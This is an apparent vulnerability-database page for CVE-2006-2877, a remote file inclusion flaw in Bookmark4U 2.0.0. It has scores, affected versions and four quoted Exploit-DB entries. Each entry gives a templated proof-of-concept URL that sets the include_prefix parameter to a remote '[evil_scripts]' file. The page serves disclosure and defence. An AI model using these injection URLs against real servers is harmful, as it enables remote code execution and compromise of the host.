CVE-2006-2877
published 2006-06-07CVE-2006-2877: PHP remote file inclusion vulnerability in Bookmark4U 2.0.0 and earlier allows remote attackers to include arbitrary PHP files via the include_prefix parameter…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
7.47%
93.7th percentile
PHP remote file inclusion vulnerability in Bookmark4U 2.0.0 and earlier allows remote attackers to include arbitrary PHP files via the include_prefix parameter in (1) inc/dbase.php, (2) inc/config.php, (3) inc/common.php, and (4) inc/function.php. NOTE: it has been reported that the inc directory is protected by a .htaccess file, so this issue only applies in certain environments or configurations.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sangwan_kim | bookmark4u | <= 2.0 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Bookmark4U 2.0 - '/inc/config.php?env[include_prefix]' Remote File Inclusion
exploitdb·2006-06-05
CVE-2006-2877 Bookmark4U 2.0 - '/inc/config.php?env[include_prefix]' Remote File Inclusion
Bookmark4U 2.0 - '/inc/config.php?env[include_prefix]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/18281/info
Bookmark4U is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/[Bookmark4Upath]/inc/config.php?env[include_prefix]=[evil_scripts]
Exploit-DB
Bookmark4U 2.0 - '/inc/function.php?env[include_prefix]' Remote File Inclusion
exploitdb·2006-06-05
CVE-2006-2877 Bookmark4U 2.0 - '/inc/function.php?env[include_prefix]' Remote File Inclusion
Bookmark4U 2.0 - '/inc/function.php?env[include_prefix]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/18281/info
Bookmark4U is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/[Bookmark4Upath]/inc/function.php?env[include_prefix]=[evil_scripts]
Exploit-DB
Bookmark4U 2.0 - '/inc/dbase.php?env[include_prefix]' Remote File Inclusion
exploitdb·2006-06-05
CVE-2006-2877 Bookmark4U 2.0 - '/inc/dbase.php?env[include_prefix]' Remote File Inclusion
Bookmark4U 2.0 - '/inc/dbase.php?env[include_prefix]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/18281/info
Bookmark4U is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/[Bookmark4Upath]/inc/dbase.php?env[include_prefix]=[evil_scripts]
Exploit-DB
Bookmark4U 2.0 - '/inc/common.php?env[include_prefix]' Remote File Inclusion
exploitdb·2006-06-05
CVE-2006-2877 Bookmark4U 2.0 - '/inc/common.php?env[include_prefix]' Remote File Inclusion
Bookmark4U 2.0 - '/inc/common.php?env[include_prefix]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/18281/info
Bookmark4U is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/[Bookmark4Upath]/inc/common.php?env[include_prefix]=[evil_scripts]
No writeups or analysis indexed.
http://secunia.com/advisories/19758http://securityreason.com/securityalert/1058http://securitytracker.com/id?1016224http://www.osvdb.org/26599http://www.osvdb.org/26600http://www.osvdb.org/26601http://www.osvdb.org/26602http://www.securityfocus.com/archive/1/435964/100/0/threadedhttp://www.securityfocus.com/archive/1/436027/100/0/threadedhttp://www.securityfocus.com/bid/18281https://exchange.xforce.ibmcloud.com/vulnerabilities/26933http://secunia.com/advisories/19758http://securityreason.com/securityalert/1058http://securitytracker.com/id?1016224http://www.osvdb.org/26599http://www.osvdb.org/26600http://www.osvdb.org/26601http://www.osvdb.org/26602http://www.securityfocus.com/archive/1/435964/100/0/threadedhttp://www.securityfocus.com/archive/1/436027/100/0/threadedhttp://www.securityfocus.com/bid/18281https://exchange.xforce.ibmcloud.com/vulnerabilities/26933
2006-06-07
Published